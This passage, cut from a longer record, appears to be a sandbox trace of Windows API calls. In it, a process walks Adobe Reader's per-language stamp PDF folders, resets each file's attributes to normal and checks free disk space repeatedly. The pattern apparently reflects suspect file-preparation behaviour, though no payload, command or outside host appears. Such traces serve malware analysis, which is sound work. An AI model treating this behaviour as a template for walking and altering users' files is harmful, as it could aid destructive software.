(x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0109.200] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.211] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0109.214] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0109.214] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0109.214] CoTaskMemFree (pv=0x506980) [0109.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0109.215] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.224] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0109.226] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.239] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0109.243] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.252] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0109.255] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0109.255] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0109.255] CoTaskMemFree (pv=0x506980) [0109.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0109.256] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.263] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0109.266] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.285] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0109.288] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.380] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0109.387] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0109.387] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0109.387] CoTaskMemFree (pv=0x508980) [0109.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0109.391] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.400] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0109.402] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.410] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\Faces.pdf", dwFileAttributes=0x80) returned 1 [0109.412] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.419] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\Pointers.pdf", dwFileAttributes=0x80) returned 1 [0109.422] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.428] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0109.432] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.448] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\Standard.pdf", dwFileAttributes=0x80) returned 1 [0109.452] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.542] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0109.550] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0109.550] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0109.550] CoTaskMemFree (pv=0x508980) [0109.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0109.551] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.570] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0109.574] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.587] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0109.590] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.618] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0109.622] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0109.622] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0109.623] CoTaskMemFree (pv=0x508980) [0109.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0109.626] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.639] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0109.644] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.649] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\Faces.pdf", dwFileAttributes=0x80) returned 1 [0109.654] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.663] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\Pointers.pdf", dwFileAttributes=0x80) returned 1 [0109.666] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.673] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0109.675] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.685] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\Standard.pdf", dwFileAttributes=0x80) returned 1 [0109.688] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.699] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0109.710] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0109.710] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0109.710] CoTaskMemFree (pv=0x508980) [0109.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0109.714] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.723] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0109.726] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.734] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\Faces.pdf", dwFileAttributes=0x80) returned 1 [0109.737] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.743] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\Pointers.pdf", dwFileAttributes=0x80) returned 1 [0109.747] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.753] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0109.756] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.767] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\Standard.pdf", dwFileAttributes=0x80) returned 1 [0109.771] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.780] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0109.783] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0109.783] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0109.783] CoTaskMemFree (pv=0x508980) [0109.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0109.785] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.791] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0109.794] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.803] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0109.806] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.815] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0109.818] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0109.818] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0109.819] CoTaskMemFree (pv=0x508980) [0109.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0109.820] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.829] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0109.832] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.840] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\Hanko.pdf", dwFileAttributes=0x80) returned 1 [0109.843] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.849] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0109.852] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.864] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0109.867] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0109.867] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0109.868] CoTaskMemFree (pv=0x508980) [0109.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0109.868] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.877] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0109.880] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.888] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\Hanko.pdf", dwFileAttributes=0x80) returned 1 [0109.892] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.900] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0109.903] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.917] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0109.920] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0109.920] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0109.920] CoTaskMemFree (pv=0x508980) [0109.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0109.921] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.929] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0109.939] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.947] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0109.950] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.960] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0109.963] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0109.963] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: 